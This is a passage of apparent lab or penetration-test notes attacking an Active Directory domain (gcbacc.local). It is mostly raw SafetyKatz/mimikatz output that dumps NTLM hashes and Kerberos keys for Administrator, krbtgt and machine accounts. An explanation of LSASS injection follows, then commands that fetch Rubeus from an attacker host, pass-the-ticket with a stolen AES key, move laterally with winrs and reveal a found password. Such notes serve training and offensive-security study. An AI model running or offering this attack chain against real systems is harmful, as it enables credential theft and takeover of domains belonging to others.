      Authentication Id : 0 ; 31261 (00000000:00007a1d)
      Session           : Interactive from 0
      User Name         : UMFD-0
      Domain            : Font Driver Host
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:00 AM
      SID               : S-1-5-96-0-0
      
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
               * Key List :
                 aes256_hmac       94f15beb31b7fdfcb7a40b661561c834dcb726ac92128cc0f5a213de7f9ba06c
                 aes128_hmac       abfc201f107b2392d9084d8542489d09
                 rc4_hmac_nt       b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old      b337f797ea0ada49d01db9f8c1fe0255
                 rc4_md4           b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_nt_exp   b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old_exp  b337f797ea0ada49d01db9f8c1fe0255
      
      Authentication Id : 0 ; 31245 (00000000:00007a0d)
      Session           : Interactive from 1
      User Name         : UMFD-1
      Domain            : Font Driver Host
      Logon Server      : (null)
      Logon Time        : 2/15/2024 4:41:00 AM
      SID               : S-1-5-96-0-1
      
               * Username : ACC-DC07$
               * Domain   : gcbacc.local
               * Password : 58 99 0b dd e5 93 96 6c 29 e4 00 32 41 9a 4e 50 3c 4f cd 20 2f c2 32 4c 91 ec d0 f3 74 f1 e1 bc 3c 95 f2 c0 bf 8e cd 9a 9d ad 91 30 5d 84 03 fb f4 68 ec a9 cd 85 21 2d 6c 09 80 c7 7e 68 7a ee a6 d6 3e 57 c8 2d 54 36 49 3c 26 82 16 44 a3 c3 64 2a cf 91 e3 b3 63 21 33 a2 e4 84 04 78 37 6a 39 25 2c df 9c 8a a6 41 97 f5 82 ac ac 52 a6 76 66 4a a8 3b 4b 53 75 e7 39 04 f8 51 ba 44 c1 f7 14 14 74 13 e4 5b 37 4f 94 21 e2 57 dc ae 6d 96 7b 41 ac 66 b1 cc d1 f3 3f 59 10 2b 2b c8 74 ea e9 b2 b2 bc db ca 38 a6 ea 8d ad d6 f4 b6 c2 ae cd bd b2 f5 8e 3b 35 7e 8c c8 46 4e bf fa 1e 73 30 3b dd 58 1e 38 08 42 7a 3b 47 43 81 14 c6 1e 82 47 40 dd 52 56 b2 ec e5 4c 61 3c 9c a2 ce 3d 09 8d 3e f9 f8 af 1c f4 1b 63 49 99 ca 48 12 2c
               * Key List :
                 aes256_hmac       94f15beb31b7fdfcb7a40b661561c834dcb726ac92128cc0f5a213de7f9ba06c
                 aes128_hmac       abfc201f107b2392d9084d8542489d09
                 rc4_hmac_nt       b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old      b337f797ea0ada49d01db9f8c1fe0255
                 rc4_md4           b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_nt_exp   b337f797ea0ada49d01db9f8c1fe0255
                 rc4_hmac_old_exp  b337f797ea0ada49d01db9f8c1fe0255
      
      mimikatz(commandline) # exit
    • lsadump::lsa /inject
      C:\>C:\SafetyKatz.exe "privilege::debug" "lsadump::lsa /inject" "exit"
      C:\SafetyKatz.exe "privilege::debug" "lsadump::lsa /inject" "exit"
      
        .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
       .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
       ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
       ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
       '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
        '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
      
      mimikatz(commandline) # privilege::debug
      Privilege '20' OK
      
      mimikatz(commandline) # lsadump::lsa /inject
      Domain : ACC / S-1-5-21-3331877400-209796306-1317730910
      
      RID  : 000001f4 (500)
      User : Administrator
      
       * Primary
          NTLM : 70d6b3cabbe11f8f0b06a7380e7a5005
          LM   :
        Hash NTLM: 70d6b3cabbe11f8f0b06a7380e7a5005
          ntlm- 0: 70d6b3cabbe11f8f0b06a7380e7a5005
          ntlm- 1: c87a64622a487061ab81e51cc711a34b
          lm  - 0: 4469739c87b8924f24a1cf0ae43a38ae
      
       * WDigest
          01  a1daa7ded0d0998e66057429509709a2
          02  3aeb0e5620f78cfec3057b860a7c78eb
          03  b35a7f9549ebf242b2c455b6553959d9
          04  a1daa7ded0d0998e66057429509709a2
          05  fd4b7c318d3419491517c00c16ae2829
          06  c6348aa48f3d9425ad597c0e0c688345
          07  ca38efb3636aa31a4236aac01c159d99
          08  eb170ffd92a5e806546d602b0336a2b5
          09  580f9d24c62d0b2484b519787710b10c
          10  dbabb3568fee6539731e1a2da6ff9c15
          11  68b036086d85c098010a9b9e1ba362f2
          12  eb170ffd92a5e806546d602b0336a2b5
          13  c804d08c5a63699198d76cdecd739841
          14  7195d7336cdf437c50afaf80b29b7434
          15  c9b6dd7e7fc40f69fae44fe467be4994
          16  72be1da83ce01cc5903c5c74ddbe0b9f
          17  1a30f252f9afbef3fbcd57169a707ba8
          18  4a2df9fb5cf890068dd166ce7b5835e4
          19  d479255357d1d5e319fcab9bcd6e2675
          20  3a70b4293e925fceb141d1a23c7dd018
          21  39ebeb37409bcfbc32441036199a12d2
          22  a53728b002c309fc1596f1419c84ff9f
          23  3e0e9092bec1ee0b8483c1acb6204700
          24  29c422edf66f7cd1ba6cce939ae40409
          25  608113e5a875ab26cc8dbcd6fe221aae
          26  509e19a4b931636755c8e75c1d26add6
          27  8eb042f1fd4337c625e04ff055654ec5
          28  b4f011f55e422e0253b31a65e7bcc2f9
          29  b5214351c59ffa0a3b73e4fe2073f8e1
      
       * Kerberos
          Default Salt : GCBACC.LOCALAdministrator
          Credentials
            des_cbc_md5       : 1991b5c1d0dca7ae
          OldCredentials
            des_cbc_md5       : c486801a028a2664
      
       * Kerberos-Newer-Keys
          Default Salt : GCBACC.LOCALAdministrator
          Default Iterations : 4096
          Credentials
            aes256_hmac       (4096) : c7be62bcc5d4e1d45c29c4e90bc543c0596b4f0b31bffb791cfec73ae93e334f
            aes128_hmac       (4096) : 1ead57438920b74ff1fbadd017fa6f6a
            des_cbc_md5       (4096) : 1991b5c1d0dca7ae
          OldCredentials
            aes256_hmac       (4096) : 51062bfba4cc505d05daf0ca563737c6c3ac2eb29f98cb87d6ceb25930151be9
            aes128_hmac       (4096) : c493ee1f472891e2f56ddbeb7b41956a
            des_cbc_md5       (4096) : c486801a028a2664
          OlderCredentials
            aes256_hmac       (4096) : 6ee5d99e81fd6bdd2908243ef1111736132f4b107822e4eebf23a18ded385e61
            aes128_hmac       (4096) : 6508ee108b9737e83f289d79ea365151
            des_cbc_md5       (4096) : 31435d975783d0d0
      
       * NTLM-Strong-NTOWF
          Random Value : be91a3815a14eaff583f5f86be282d68
      
      RID  : 000001f5 (501)
      User : Guest
      
       * Primary
          NTLM :
          LM   :
      
      RID  : 000001f6 (502)
      User : krbtgt
      
       * Primary
          NTLM : 424db28087e04ff82439041d5a733d09
          LM   :
        Hash NTLM: 424db28087e04ff82439041d5a733d09
          ntlm- 0: 424db28087e04ff82439041d5a733d09
          lm  - 0: fd7e39f8b7987eeef73c2a28eea2434d
      
       * WDigest
          01  d6d0c5cf3fd58bb02f3a1d9e1a9359fb
          02  4e7d7c1338160d639b4c7eb2db7f5fd7
          03  cda247a0e201dd2b57a81b8777a92e4f
          04  d6d0c5cf3fd58bb02f3a1d9e1a9359fb
          05  4e7d7c1338160d639b4c7eb2db7f5fd7
          06  7e911b48164a4a3f3d5eb13b2fa2c166
          07  d6d0c5cf3fd58bb02f3a1d9e1a9359fb
          08  6e887e73dfb65f25e08dfa8866df82e2
          09  6e887e73dfb65f25e08dfa8866df82e2
          10  e25f5075294a18501821053b1d15b893
          11  710a5a3cb65b23852b7918dbeedbc20f
          12  6e887e73dfb65f25e08dfa8866df82e2
          13  27c4a63ea9fa3a18e8fbd7a697507969
          14  710a5a3cb65b23852b7918dbeedbc20f
          15  985dbea5da5a18d615da979119d17943
          16  985dbea5da5a18d615da979119d17943
          17  475f6ae1de481e579026915004bd80bb
          18  ccb3ca6573ad4582bcf73b8727dd7be7
          19  c4cf9dd54678c51d667793f45da32c57
          20  803c411a7bafa48495371dc55328f0f2
          21  bc608a93f4a4c50afb2b4df2a7299733
          22  bc608a93f4a4c50afb2b4df2a7299733
          23  f69db03788a6c4eb4c0ddd911f21fe14
          24  e4b52afd0655b79b5cef6529dc039a22
          25  e4b52afd0655b79b5cef6529dc039a22
          26  f6a54816a57cc7ab0dec0c06b3550ff4
          27  b46234cf39e9c0d3f2647929ee09fa25
          28  5f2fad6cbfb515b57d44f26d53c1a37d
          29  f018c3a94e5d512b953b12a2692933e3
      
       * Kerberos
          Default Salt : GCBACC.LOCALkrbtgt
          Credentials
            des_cbc_md5       : b9d9bc925b6d5798
      
       * Kerberos-Newer-Keys
          Default Salt : GCBACC.LOCALkrbtgt
          Default Iterations : 4096
          Credentials
            aes256_hmac       (4096) : d36fd4c2561078f2f7230d81fa0b32719bc440224c2cd4e531e278e6272748b7
            aes128_hmac       (4096) : 41ec47d1b8e8b36155edc84a50390ef5
            des_cbc_md5       (4096) : b9d9bc925b6d5798
      
       * NTLM-Strong-NTOWF
          Random Value : eafabcb0b07b290abbb022680adefba2
      
      RID  : 000003e8 (1000)
      User : ACC-DC07$
      
       * Primary
          NTLM : b337f797ea0ada49d01db9f8c1fe0255
          LM   :
        Hash NTLM: b337f797ea0ada49d01db9f8c1fe0255
          ntlm- 0: b337f797ea0ada49d01db9f8c1fe0255
          ntlm- 1: 426f6abbf19e85988370951cbb954d15
          ntlm- 2: 9d35c6e72ce185a772c3417283c1af18
          lm  - 0: 650560eddfcd7194500bcd30d97db85c
          lm  - 1: 7cc351d9b074a149d87cb876eb949492
      
       * WDigest
          01  904d042a2a31b77c17c9a6afdcaa55d1
          02  ad6c4780dfba0ca42bd805dbb605c9a9
          03  904d042a2a31b77c17c9a6afdcaa55d1
          04  904d042a2a31b77c17c9a6afdcaa55d1
          05  44c3bba5e8c0da6d08697f92d5a4042e
          06  44c3bba5e8c0da6d08697f92d5a4042e
          07  e9d4cf3cbb5deddfa26ee93e2ca89942
          08  c1a54a1e6909d664a028bb7533424369
          09  58ec3a17614b521bb8a1ce111df2ca6f
          10  1315a9562ee41422564f68f93362f117
          11  1315a9562ee41422564f68f93362f117
          12  c1a54a1e6909d664a028bb7533424369
          13  c1a54a1e6909d664a028bb7533424369
          14  d671e328f532d0dc83924fc72efdd999
          15  96cb0e5e57347aa0bf2d90cbd8ec8584
          16  5796feffed8f58b2ce412cc8dabc7d6c
          17  467ef8fdad14051fb6a7be12dc58b4ff
          18  0c3c5a46c0e21fa4862a210596c87dda
          19  55e5b2562bc500be0e4701f36a6e5eaa
          20  0c3c5a46c0e21fa4862a210596c87dda
          21  56e61d4cb214c71b2faf17a121c79287
          22  e3176548660c63b55a994ce8d88be79f
          23  56e61d4cb214c71b2faf17a121c79287
          24  f153890eb7106e2c9542c65186739efd
          25  493d2a4aec05b638cd3410f499f61d24
          26  6537b35d2e4650f597eb8878ff8c75fa
          27  b54a87c98c7310e62d6f71bc70e1e875
          28  fd8c063c68c2b31ee610a0e5d599482f
          29  b54a87c98c7310e62d6f71bc70e1e875
      
       * Kerberos
          Default Salt : GCBACC.LOCALhostacc-dc07.gcbacc.local
          Credentials
            des_cbc_md5       : 07e9458079e00b6e
          OldCredentials
            des_cbc_md5       : a41f7c43866d5b9d
      
       * Kerberos-Newer-Keys
          Default Salt : GCBACC.LOCALhostacc-dc07.gcbacc.local
          Default Iterations : 4096
          Credentials
            aes256_hmac       (4096) : 0b6fa3cfdabc43dc636e634d54f24b924a29a2a50ae5af9a887f39fc22e495c8
            aes128_hmac       (4096) : fbe1f0778827b831efe85d3b2ffae5cf
            des_cbc_md5       (4096) : 07e9458079e00b6e
          OldCredentials
            aes256_hmac       (4096) : 8b7cffebde5c45edb5d01a46fc1456f76dc825872f8100e3abfdd889d2915c9c
            aes128_hmac       (4096) : 42c30ae2279b429340f90f0aa59b25aa
            des_cbc_md5       (4096) : a41f7c43866d5b9d
          OlderCredentials
            aes256_hmac       (4096) : ea8a5196d687e81be7659693fccc28bb0890a54b94f76585093987d520f012fc
            aes128_hmac       (4096) : 5b736eeaafde72e12c0f353d4b2e3d6e
            des_cbc_md5       (4096) : c7cbb05ba81691ec
      
      RID  : 0000044f (1103)
      User : ACC-DATA$
      
       * Primary
          NTLM : 41e43c7f30326a9658e7dc27205b2a93
          LM   :
        Hash NTLM: 41e43c7f30326a9658e7dc27205b2a93
          ntlm- 0: 41e43c7f30326a9658e7dc27205b2a93
          ntlm- 1: 2e50263681ec594d1614348e2d47e806
          ntlm- 2: 0a2541b6e7b3808de38f9669e1f05f24
          lm  - 0: e7a01792510f407a32a5923502764329
          lm  - 1: 7942200395c5950be1c048169b64c8ac
          lm  - 2: 1be7ff6a2dcb00e9247bcb9da5be79f7
      
       * WDigest
          01  854535bc455b9b03a264b280ee9fb457
          02  b750375f203b7d8191039ee130632e56
          03  854535bc455b9b03a264b280ee9fb457
          04  854535bc455b9b03a264b280ee9fb457
          05  8fe1db2eea01f786974db47c00852649
          06  8fe1db2eea01f786974db47c00852649
          07  22cb8364e0322b4ff2554a679a1048f6
          08  3450ab76ff5e46d98afe29a55e33ba4f
          09  251749dbfff2c8498078550e8c624788
          10  1556f96b13ade8535090f40e0769330b
          11  1556f96b13ade8535090f40e0769330b
          12  3450ab76ff5e46d98afe29a55e33ba4f
          13  3450ab76ff5e46d98afe29a55e33ba4f
          14  0e21a4afa75e1dc08e9057b4edf8d4c2
          15  97e70b4b74e02219d3ab6671ec114dba
          16  10ef498e8d8efafdb5442733955ed8fb
          17  5bdf2af3a9c47850d374918563e11a1b
          18  b9c6d9b1c4c101f854ab1c838dd23ea6
          19  1bc64c4630de3cecc321d9dce802de43
          20  b9c6d9b1c4c101f854ab1c838dd23ea6
          21  a2f935fbbadd38316d0938f94f246e69
          22  bf53aef97d13cffeedb4d874800cb168
          23  a2f935fbbadd38316d0938f94f246e69
          24  195d1258060e17d1d0de58c2643e644b
          25  02f10996e6cc2a9aed008574097c282c
          26  e39854ded35b81a41544c7b067b89657
          27  9feae52f4358f37569c4ca1d4908a228
          28  c77b07d685950f0adbd115fa0d86dea4
          29  9feae52f4358f37569c4ca1d4908a228
      
       * Kerberos
          Default Salt : GCBACC.LOCALhostacc-data.gcbacc.local
          Credentials
            des_cbc_md5       : bf4c92cb1616cea4
          OldCredentials
            des_cbc_md5       : 98460d2c673d6b46
      
       * Kerberos-Newer-Keys
          Default Salt : GCBACC.LOCALhostacc-data.gcbacc.local
          Default Iterations : 4096
          Credentials
            aes256_hmac       (4096) : 767562cf7478c571d4d25f1a7fc5ddb64ca3e71579ad79399cd6212c02523233
            aes128_hmac       (4096) : dfcefbfe3dc4e2eb1c0f80d95c01047d
            des_cbc_md5       (4096) : bf4c92cb1616cea4
          OldCredentials
            aes256_hmac       (4096) : e3dd518eeb561d6df5c2b3f3e0ab8c97abe40a377f614b783fd68195bd82e2f1
            aes128_hmac       (4096) : 57b836cb0068705bf96b07b776de1b64
            des_cbc_md5       (4096) : 98460d2c673d6b46
          OlderCredentials
            aes256_hmac       (4096) : 514cf8bd97737d261abd66425433c50f403bdd8088b193ad21e99d2c4e0dd921
            aes128_hmac       (4096) : af43aa8e3719bb9acc97e6d22d68fa61
            des_cbc_md5       (4096) : efd0cebceadccb34
      
      mimikatz(commandline) # exit

    The command lsadump::lsa /inject in SafetyKatz is a sophisticated memory extraction technique aimed specifically at retrieving secrets directly from the Local Security Authority (LSA) subsystem on Windows hosts. To deeply understand how this works, let's first clarify what the LSA subsystem is, why it stores secrets, and what exactly SafetyKatz does with the injection.

    The LSA subsystem (lsass.exe) is a crucial security component in Windows operating systems responsible for enforcing local security policies, handling authentication processes, managing user logins, and securely storing sensitive system secrets. These secrets include various categories of sensitive information such as:

    • Cached service account passwords.
    • Passwords used by services configured to run as specific users.
    • Credentials used by scheduled tasks.
    • Secret keys used by specific subsystems or components, like automatic domain trust passwords.
    • Machine account passwords (for trust establishment within Active Directory domains).

    These types of secrets are securely stored in memory structures that LSA manages and protects from casual access or unauthorized retrieval. By default, even administrators do not have straightforward visibility into these secrets due to memory protection mechanisms such as Protected Process Light (PPL) in newer Windows editions, and encryption through DPAPI or other cryptographic functions.

    The command lsadump::lsa /inject specifically bypasses these protection mechanisms by performing a process injection directly into the running LSASS process itself. Here's precisely how it operates under the hood when we execute lsadump::lsa /inject, SafetyKatz:

    1. Identifies the running LSASS process, which hosts the sensitive secrets in protected memory.
    1. Allocates memory within LSASS itself to prepare the injection of specialized code (shellcode).
    1. Injects shellcode or reflective loading methods directly into LSASS to execute from within the trusted process context, thereby gaining full access to memory structures that are otherwise inaccessible from the outside.
    1. Once executed within LSASS, the injected code leverages internal undocumented Windows APIs and direct memory references to locate and extract secret information from encrypted or hidden memory structures that LSA maintains.
    1. After gathering the secrets, the injected module communicates these secrets back to the primary SafetyKatz instance, which then parses and outputs the secrets clearly in plaintext form.

    The reason this specific approach succeeded in your scenario retrieving the credentials for the acc-data account, while the other standard methods like sekurlsa::logonpasswords, sekurlsa::ekeys, or even DCSync failed, is linked to how and where Windows stores different types of credentials and secrets:

    • sekurlsa::logonpasswords extracts credentials actively cached in memory from interactive logins or sessions. If an account hasn’t actively logged in, or if it's configured as a managed or scheduled service account that doesn't initiate interactive sessions, it won't be found here.
    • sekurlsa::ekeys primarily extracts encryption keys related to Kerberos tickets stored in memory. If the target account hasn't recently been involved in Kerberos authentication exchanges or caching processes, this won't yield useful results either.
    • DCSync requires that the account’s credentials or hashes be stored in the NTDS.dit (Active Directory database), and that they be replicated from a domain controller. If an account was defined as a local service or special local account managed locally without replication into the domain database, DCSync won't retrieve it.

    In contrast, lsadump::lsa /inject uniquely accesses directly managed secrets cached by the local system's security subsystem for specific scenarios like:

    • Service accounts configured with credentials on services or scheduled tasks.
    • Secrets stored for internal domain and trust management tasks.
    • Accounts or passwords stored locally but never actively logged in or replicated.

    The depth of this method's power and effectiveness arises from its internal positioning, operating directly within the LSASS memory space and its capability of reading secrets directly from encrypted or hidden memory regions, bypassing external API restrictions and replication limitations.

    Importing ADModule into ACC-DC

    Invoke-WebRequest -Uri http://192.168.100.41:443/ADModule-master.zip -OutFile "C:\ADModule-master.zip" -UseBasicParsing

    Expand-Archive -Path "C:\ADModule-master.zip" -DestinationPath "C:\"

    Enumerating Users

    Get-ADUser -Filter * | Select-Object -ExpandProperty 'name'

    Enumerating Computers

    Get-ADComputer -Filter * | Select-Object -ExpandProperty 'name'

    Impersonating Administrator in GCBACC.LOCAL

    Invoke-WebRequest -Uri http://192.168.100.41:443/Rubeus.exe -OutFile "C:\Rubeus.exe" -UseBasicParsing

    .\Rubeus.exe asktgt /user:administrator /aes256:c7be62bcc5d4e1d45c29c4e90bc543c0596b4f0b31bffb791cfec73ae93e334f /opsec /force /domain:gcbacc.local /ptt

    Accessing ACC-DATA

    winrs -r:acc-data.gcbacc.local cmd

    While enumerating de ACC-DATA.GCBACC.LOCAL computer, it is possible to find out a file named escrow2.txt that contains the following credentials what it seems to be a password(theC0mp@ny).